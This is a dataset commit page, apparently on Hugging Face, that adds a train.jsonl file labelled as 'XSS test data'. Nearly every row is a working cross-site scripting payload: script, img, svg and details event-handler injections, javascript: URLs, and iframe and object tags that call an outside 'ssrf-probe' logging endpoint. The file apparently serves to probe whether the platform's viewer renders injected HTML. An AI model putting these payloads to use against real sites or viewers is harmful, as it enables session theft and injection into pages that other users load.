FIRSTACCOUNT69 commited on
Commit
cd467f4
·
verified ·
1 Parent(s): f390423

Add XSS test data

Browse files
Files changed (1) hide show
  1. train.jsonl +9 -0
train.jsonl ADDED
@@ -0,0 +1,9 @@
 
 
 
 
 
 
 
 
 
 
1
+ {"text": "<img src=x onerror=alert(document.domain)>", "label": "xss1"}
2
+ {"text": "<svg onload=alert(1)>", "label": "xss2"}
3
+ {"text": "<script>alert(document.cookie)</script>", "label": "xss3"}
4
+ {"text": "javascript:alert(1)", "label": "xss4"}
5
+ {"text": "<a href='javascript:alert(1)'>click</a>", "label": "xss5"}
6
+ {"text": "<iframe src='https://firstaccount69-ssrf-probe.hf.space/log?source=iframe'></iframe>", "label": "xss6"}
7
+ {"text": "<object data='https://firstaccount69-ssrf-probe.hf.space/log?source=object'></object>", "label": "xss7"}
8
+ {"text": "<details open ontoggle=alert(1)><summary>XSS</summary>test</details>", "label": "xss8"}
9
+ {"text": "normal text", "label": "control"}